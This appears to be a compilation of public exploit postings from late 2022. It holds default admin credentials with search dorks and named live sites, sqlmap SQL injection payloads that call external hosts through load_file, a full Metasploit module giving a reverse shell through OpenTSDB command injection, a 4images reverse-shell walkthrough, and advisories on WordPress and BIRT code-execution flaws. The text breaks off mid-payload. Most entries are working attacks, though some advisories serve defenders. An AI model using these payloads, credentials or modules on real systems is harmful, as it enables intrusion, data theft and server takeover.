<pre><code>====================================================================================================================================<br />| # Title : Car Dealer Pro v2.01 Backdoor Account Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://codecanyon.net/item/car-dealer-pro/7265588 | <br />| # Dork : "Powered by: Car Dealer Pro" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=admin & pass=pass1234 <br /><br />[+] http://car.wenclub.vip/admin/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Botble 5.28.3 Backdoor Account Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : hhttps://codecanyon.net/item/botble-cms-php-platform-based-on-laravel-framework/16928182 | <br />| # Dork : "Botble Technologies. All right reserved." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=botble & pass=159357 <br /><br />[+] https://cms.botble.com/admin/login<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Active ecommerce cms v6.4.0 Backdoor Account Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit) | <br />| # Vendor : https://codecanyon.net/item/active-ecommerce-cms/23471405?s_rank=24 | <br />| # Dork : "category/beauty-health-hair" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=admin@example.com & pass=123456 <br /><br />[+] https://www.sbeshopping.com/login<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>## Title: Student-Attendance-Management-System 1.0 from Erick O. Omundi Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 12.25.2022<br />## Vendor: https://github.com/rickxy<br />## Software: https://github.com/rickxy/Student-Attendance-Management-System<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System<br /><br />## Description:<br />The `username` parameter appears to be vulnerable to Multiple-SQL<br />injection attacks.<br />The attacker can retrieve all sensitive information about the users of<br />this system and more bad things.<br /><br />## STATUS: CRITICAL Vulnerability<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: userType=Administrator&username=lBPxXeUT'+(select<br />load_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''<br />RLIKE (SELECT (CASE WHEN (6217=6217) THEN 0x6c42507858655554+(select<br />load_file(0x5c5c5c5c6571387234703362397536676e343276333866366361346366336c77396f7866303373716a65382e657269636b5f66726f6d5f416d65726963612e636f6d5c5c6b6877))+''<br />ELSE 0x28 END)) AND 'FUJm'='FUJm&password=q2H!z4n!F1&login=Login<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: userType=Administrator&username=lBPxXeUT'+(select<br />load_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''<br />AND (SELECT 8687 FROM (SELECT(SLEEP(7)))btHE) AND<br />'XFcq'='XFcq&password=q2H!z4n!F1&login=Login<br />---<br />```<br /><br />## Reproduce:<br />[href]()https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/goy6ka)<br /><br />## Time spent<br />`00:30:00`<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'OpenTSDB 2.4.0 unauthenticated command injection',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection<br /> vulnerability in the yrange parameter in OpenTSDB through<br /> 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated<br /> remote code execution as the root user.<br /><br /> The module first attempts to obtain the OpenTSDB version via<br /> the api. If the version is 2.4.0 or lower, the module<br /> performs additional checks to obtain the configured metrics<br /> and aggregators. It then randomly selects one metric and one<br /> aggregator and uses those to instruct the target server to<br /> plot a graph. As part of this request, the yrange parameter is<br /> set to the payload, which will then be executed by the target<br /> if the latter is vulnerable.<br /><br /> This module has been successfully tested against OpenTSDB<br /> version 2.3.0.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Shai rod', # @nightrang3r - discovery and PoC<br /> 'Erik Wynter' # @wyntererik - Metasploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2020-35476'],<br /> ['URL', 'https://github.com/OpenTSDB/opentsdb/issues/2051'] # disclosure and PoC<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 4242<br /> },<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'CmdStagerFlavor' => %w[bourne curl wget],<br /> 'Targets' => [<br /> [<br /> 'Automatic (Unix In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },<br /> 'Type' => :unix_memory<br /> }<br /> ],<br /> [<br /> 'Automatic (Linux Dropper)',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2020-11-18',<br /> 'DefaultTarget' => 1,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options [<br /> OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),<br /> ]<br /> end<br /><br /> def check<br /> # sanity check to see if the target is likely OpenTSDB<br /> res1 = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> })<br /><br /> unless res1<br /> return CheckCode::Unknown('Connection failed.')<br /> end<br /><br /> unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB')<br /> return CheckCode::Safe('Target is not an OpenTSDB application.')<br /> end<br /><br /> # get the version via the api<br /> res2 = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'version')<br /> })<br /><br /> unless res2<br /> return CheckCode::Unknown('Connection failed.')<br /> end<br /><br /> unless res2.code == 200 && res2.body.include?('version')<br /> return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')<br /> end<br /><br /> begin<br /> parsed_res_body = JSON.parse(res2.body)<br /> rescue JSON::ParserError<br /> return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')<br /> end<br /><br /> unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version')<br /> return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')<br /> end<br /><br /> version = parsed_res_body['version']<br /><br /> begin<br /> if Rex::Version.new(version) <= Rex::Version.new('2.4.0')<br /> return CheckCode::Appears("The target is OpenTSDB version #{version}")<br /> else<br /> return CheckCode::Safe("The target is OpenTSDB version #{version}")<br /> end<br /> rescue ArgumentError => e<br /> return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")<br /> end<br /> end<br /><br /> def select_metric<br /> # check if any metrics have been configured. if not, exploitation cannot work<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'suggest'),<br /> 'vars_get' => { 'type' => 'metrics' }<br /> })<br /><br /> unless res<br /> fail_with(Failure::Unknown, 'Connection failed.')<br /> end<br /><br /> unless res.code == 200<br /> fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics")<br /> end<br /><br /> begin<br /> metrics = JSON.parse(res.body)<br /> rescue JSON::ParserError<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.')<br /> end<br /><br /> unless metrics.is_a?(Array)<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array')<br /> end<br /><br /> if metrics.empty?<br /> fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible')<br /> end<br /><br /> # select a random metric since any will do<br /> @metric = metrics.sample<br /> print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}")<br /> end<br /><br /> def select_aggregator<br /> # check the configured aggregators and select one at random<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'aggregators')<br /> })<br /><br /> unless res<br /> fail_with(Failure::Unknown, 'Connection failed.')<br /> end<br /><br /> unless res.code == 200<br /> fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators")<br /> end<br /><br /> begin<br /> aggregators = JSON.parse(res.body)<br /> rescue JSON::ParserError<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.')<br /> end<br /><br /> unless aggregators.is_a?(Array)<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array')<br /> end<br /><br /> if aggregators.empty?<br /> fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible')<br /> end<br /><br /> # select a random aggregator since any will do<br /> @aggregator = aggregators.sample<br /> print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # use base64 to avoid special char escape hell (specifying BadChars did not help)<br /> cmd = "'echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/sh'"<br /> start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data<br /> start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S')<br /> end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data<br /> end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S')<br /><br /> get_vars = {<br /> 'start' => start_value,<br /> 'end' => end_value,<br /> 'm' => "#{@aggregator}:#{@metric}",<br /> 'yrange' => "[1:system(#{Rex::Text.uri_encode(cmd)})]",<br /> 'wxh' => "#{rand(800..1600)}x#{rand(400..600)}",<br /> 'style' => 'linespoint'<br /> }<br /><br /> exploit_uri = '?'<br /> get_vars.each do |key, value|<br /> exploit_uri += "#{key}=#{value}&"<br /> end<br /> exploit_uri += 'json'<br /><br /> # using a raw request because cgi was leading to encoding issues<br /> send_request_raw({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri)<br /> }, 0) # we don't have to wait for a reply here<br /> end<br /><br /> def exploit<br /> select_metric<br /> select_aggregator<br /> if target.arch.first == ARCH_CMD<br /> print_status('Executing the payload')<br /> execute_command(payload.encoded)<br /> else<br /> execute_cmdstager(background: true)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>Description: Unauthenticated Arbitrary File Upload<br /><br />Affected Plugin: Yith WooCommerce Gift Cards Premium<br /><br />Plugin Slug: yith-woocommerce-gift-cards-premium<br /><br />Affected Versions: <= 3.19.0<br /><br />CVE ID: CVE-2022-45359<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N<br /><br />Researcher/s: Dave Jong<br /><br />Fully Patched Version: 3.20.0<br /><br />We were able to reverse engineer the exploit based on attack traffic and a copy of the vulnerable plugin and are providing information on its functionality as this vulnerability is already being exploited in the wild and a patch has been available for some time.<br /><br />The issue lies in the import_actions_from_settings_panel function which runs on the admin_init hook.<br /><br />Since admin_init runs for any page in the /wp-admin/ directory, it is possible to trigger functions that run on admin_init as an unauthenticated attacker by sending a request to /wp-admin/admin-post.php.<br /><br />Since the import_actions_from_settings_panel function also lacks a capability check and a CSRF check, it is trivial for an attacker to simply send a request containing a page parameter set to yith_woocommerce_gift_cards_panel, a ywgc_safe_submit_field parameter set to importing_gift_cards, and a payload in the file_import_csv file parameter.<br /><br />Since the function also does not perform any file type checks, any file type including executable PHP files can be uploaded.<br /><br /><br />Cyber Observables<br /><br />These attacks may appear in your logs as unexpected POST requests to wp-admin/admin-post.php from unknown IP addresses. Additionally, we have observed the following payloads which may be useful in determining whether your site has been compromised. Note that we are providing normalized hashes (hashes of the file with all extraneous whitespace removed):<br /><br />kon.php/1tes.php – this file loads a copy of the “marijuana shell” file manager in memory from a remote location at shell[.]prinsh[.]com and has a normalized sha256 hash of 1a3babb9ac0a199289262b6acf680fb3185d432ed1e6b71f339074047078b28c<br /><br />b.php – this file is a simple uploader with a normalized sha256 hash of 3c2c9d07da5f40a22de1c32bc8088e941cea7215cbcd6e1e901c6a3f7a6f9f19<br /><br />admin.php – this file is a password-protected backdoor and has a normalized sha256 hash of 8cc74f5fa8847ba70c8691eb5fdf8b6879593459cfd2d4773251388618cac90d<br /><br />Although we’ve seen attacks from more than a hundred IPs, the vast majority of attacks were from just two IP addresses:<br /><br />103.138.108.15, which sent out 19604 attacks against 10936 different sites<br /><br />and<br /><br />188.66.0.135, which sent 1220 attacks against 928 sites.<br /><br />The majority of attacks occurred the day after the vulnerability was disclosed, but have been ongoing, with another peak on December 14, 2022. As this vulnerability is trivial to exploit and provides full access to a vulnerable website we expect attacks to continue well into the future.<br /><br />Recommendations<br /><br />If you are running a vulnerable version of YITH WooCommerce Gift Cards Premium, that is, any version up to and including 3.19.0, we strongly recommend updating to the latest version available. While the Wordfence firewall does provide protection against malicious file uploads even for free users, attackers may still be able to cause nuisance issues by abusing the vulnerable functionality in less critical ways.<br /><br />If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.<br /><br />If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of YITH WooCommerce Gift Cards Premium as soon as possible.<br /><br />If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence Community Edition leaderboard.<br /><br /></code></pre>
<pre><code>## Title: Stock-Management-System-2022-1.0-from-Erick-Cesar Multiple SQLi<br />## Author: nu11secur1ty<br />## Date: 12.22.2022<br />## Vendor: https://github.com/rickxy/Stock-Management-System<br />## Software: https://github.com/rickxy/Stock-Management-System<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Stock-Management-System-1.0<br /><br />## Description:<br />The `user` parameter appears to be vulnerable to SQL injection attacks.<br />The payload ' was submitted in the user parameter, and a database<br />error message was returned.<br />The attacker can still all information for the system by using this<br />vulnerability.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: user (POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: user=bqxDgfIK' RLIKE (SELECT (CASE WHEN (8457=8457) THEN<br />0x627178446766494b ELSE 0x28 END)) AND<br />'BTvs'='BTvs&password=s9U!o7d!C0&btnlogin=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: user=bqxDgfIK' AND (SELECT 5004 FROM(SELECT<br />COUNT(*),CONCAT(0x7178767071,(SELECT<br />(ELT(5004=5004,1))),0x7171707a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND<br />'aQfu'='aQfu&password=s9U!o7d!C0&btnlogin=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: user=bqxDgfIK' AND (SELECT 8137 FROM<br />(SELECT(SLEEP(7)))nCyy) AND 'vQsi'='vQsi&password=s9U!o7d!C0&btnlogin=<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Stock-Management-System-1.0)<br /><br /><br />## Proof and Exploit:<br />[href](https://streamable.com/gg7pyf)<br /><br />## Time spent<br />`00:05:00`<br /><br />## Writing an exploit<br />`00:05:00`<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221216-0 ><br />=======================================================================<br /> title: Remote code execution - CVE-2021-34427 bypass<br /> product: Eclipse Business Intelligence Reporting Tool (BiRT)<br /> vulnerable version: <= 4.11.0<br /> fixed version: 4.12<br /> CVE number: CVE-2021-34427<br /> impact: High<br /> homepage: https://eclipse.github.io/birt-website/<br /> found: 2022-10-05<br /> by: Armin Stock (Atos)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"With BIRT you can create data visualizations, dashboards and reports<br />that can be embedded into web applications and rich clients. Make information out<br />of your data!"<br /><br />https://eclipse.github.io/birt-website/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Remote code execution - CVE-2021-34427 bypass<br />The vulnerability described in CVE-2021-34427 (https://www.cvedetails.com/cve/CVE-2021-34427/)<br />allows an attacker to execute code on the server, by creating a `.jsp` file<br />with the `BiRT - WebViewerExample`. This was fixed with the following code:<br /><br />-------------------------------------------------------------------------------<br />// viewer/org.eclipse.birt.report.viewer/birt/WEB-INF/classes/org/eclipse/birt/report/context/ViewerAttributeBean.java#L1081<br /> protected static void checkExtensionAllowedForRPTDocument(String rptDocumentName) throws ViewerException {<br /> int extIndex = rptDocumentName.lastIndexOf(".");<br /> String extension = null;<br /> boolean validExtension = true;<br /><br /> if (extIndex > -1 && (extIndex + 1) < rptDocumentName.length()) {<br /> extension = rptDocumentName.substring(extIndex + 1);<br /><br /> if (!disallowedExtensionsForRptDocument.isEmpty()<br /> && disallowedExtensionsForRptDocument.contains(extension)) {<br /> validExtension = false;<br /> }<br /><br /> if (!allowedExtensionsForRptDocument.isEmpty() && !allowedExtensionsForRptDocument.contains(extension)) {<br /> validExtension = false;<br /> }<br /><br /> if (!validExtension) {<br /> throw new ViewerException(BirtResources.getMessage(<br /> ResourceConstants.ERROR_INVALID_EXTENSION_FOR_DOCUMENT_PARAMETER, new String[] { extension }));<br /> }<br /><br /> }<br /> }<br />-------------------------------------------------------------------------------<br /><br />This fix can be easily bypassed by adding `/.` to the filename which allows<br />an attacker to execute arbitrary code.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Remote code execution - CVE-2021-34427 bypass<br />The old exploit results in an error message:<br /><br />-------------------------------------------------------------------------------<br />GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><% out.println("OS: " + System.getProperty("os.name")); out.println("Current dir: " + <br />getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp<@/urlencode> HTTP/1.1<br />Host: IP:18080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A<br />Upgrade-Insecure-Requests: 1<br />-------------------------------------------------------------------------------<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200<br />Set-Cookie: JSESSIONID=A1E37E7FEC80DFFF155CAF9F642ADEB7; Path=/birt; HttpOnly<br />Content-Type: text/html;charset=utf-8<br />Date: Wed, 05 Oct 2022 06:14:54 GMT<br />Connection: close<br />Content-Length: 4644<br /><br /><html><br /><head><br /><title>Error</title><br /><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/><br /></head><br /><body><br /><div id="birt_errorPage" style="color:red"><br /><span id="error_icon" style="cursor:pointer" onclick="if (document.getElementById('error_detail').style.display == 'none') { document.getElementById('error_icon').innerHTML = '- '; <br />document.getElementById('error_detail').style.display = 'block'; }else { document.getElementById('error_icon').innerHTML = '+ '; document.getElementById('error_detail').style.display = 'none'; }" > + <br /></span><br /><br />Invalid extension - "jsp" for the __document parameter.<br />-------------------------------------------------------------------------------<br /><br />But adding `/.` to the end of the filename creates the file on the server as<br />before:<br /><br />-------------------------------------------------------------------------------<br />GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><% out.println("OS: " + System.getProperty("os.name")); out.println("Current dir: " + <br />getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp/.<@/urlencode> HTTP/1.1<br />Host: IP:18080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A<br />Upgrade-Insecure-Requests: 1<br /><br />-------------------------------------------------------------------------------<br /><br />-------------------------------------------------------------------------------<br />HTTP/1.1 200<br />Set-Cookie: JSESSIONID=5CC070E6E07D94816BF67A162E7DD8D2; Path=/birt; HttpOnly<br />Content-Type: text/html;charset=utf-8<br />Date: Wed, 05 Oct 2022 05:26:01 GMT<br />Connection: close<br />Content-Length: 283<br /><br /><html><head><title>Complete</title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"></head><br /><body style="background-color: #ECE9D8;"><br /><div style="font-size:10pt;"><font color="black"><br />The report document file has been generated successfully.</font><br /></div></body></html><br />-------------------------------------------------------------------------------<br /><br />This allows the execution of the provided `JSP` code, by calling<br />`/birt/test/info-new.jsp`.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested, but all versions <= 4.11 are vulnerable.<br />* 4.10.0 (2022-10-01)<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-11-07: Vendor contacted via bugs.eclipse.org (https://bugs.eclipse.org/bugs/show_bug.cgi?id=580994)<br />2022-11-17: Vendor confirmed the bypass and is working on a fix.<br />2022-11-17: Vendor provided a fix.<br />2022-11-27: The fix was tested and could be bypassed again.<br />2022-11-27: Vendor acknowledged the bypass and provided a new fix.<br />2022-11-28: The fix was tested and we were not able to bypass it.<br />2022-11-30: Vendor releases patched version 4.12<br />2022-12-16: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />Update Eclipse BIRT to version 4.12 or newer from the vendor's website:<br />https://projects.eclipse.org/projects/technology.birt/releases/4.12.0<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Armin Stock / @2022<br /><br /></code></pre>
<pre><code># Exploit Title: 4images 1.9 - Remote Command Execution<br /># Exploit Author: Andrey Stoykov<br /># Software Link: https://www.4homepages.de/download-4images<br /># Version: 1.9<br /># Tested on: Ubuntu 20.04<br /><br /><br />To reproduce do the following:<br /><br />1. Login as administrator user<br />2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"<br />3. Select Template "categories.html"<br />4. Paste reverse shell code<br />5. Click "Save Changes"<br />6. Browse to "http://host/4images/categories.php?cat_id=1"<br /><br /><br />// HTTP POST request showing reverse shell payload<br /><br />POST /4images/admin/templates.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]<br /><br /><br /><br />// HTTP redirect response to specific template<br /><br />GET /4images/categories.php?cat_id=1 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br /># nc -kvlp 4444<br />listening on [any] 4444 ...<br />connect to [127.0.0.1] from localhost [127.0.0.1] 43032<br />Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux<br /> 13:54:28 up 2:18, 2 users, load average: 0.09, 0.68, 0.56<br />USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT<br />kali tty7 :0 11:58 2:18m 2:21 0.48s xfce4-session<br />kali pts/1 - 11:58 1:40 24.60s 0.14s sudo su<br />uid=1(daemon) gid=1(daemon) groups=1(daemon)<br />/bin/sh: 0: can't access tty; job control turned off<br />$<br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.2.2 a.k.a SLIMS 9 Multiple SQLi-Not sanitizing correctly cookie session.<br />## Author: nu11secur1ty<br />## Date: 12.20.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2<br />## Reference:<br />https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi<br /><br />## Description:<br />The manual insertion `point 3, 4, and 5` appears to be vulnerable to SQL<br />injection attacks. The payload '+(select load_file('\\\\<br />azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+' was submitted<br />in the manual insertion `point 3`.<br />This payload injects a SQL sub-query that calls MySQL's load_file function<br />with a UNC file path that references a URL on an external domain.<br />After manual testing: The parameters class, collType and membershipType are<br />vulnerable to SQLi attacks!<br />The application interacted with that domain, indicating that the injected<br />SQL query was executed.<br />The attacker can take information from all database columns of this system<br />by using this vulnerability.<br />Not sanitizing correctly cookie session.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```MySQL<br />00<br />---<br />Parameter: class (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or<br />GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\<br />716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(select<br />load_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+''<br />RLIKE (SELECT (CASE WHEN (2920=2920) THEN 0x62626262+(select<br />load_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''+(select<br 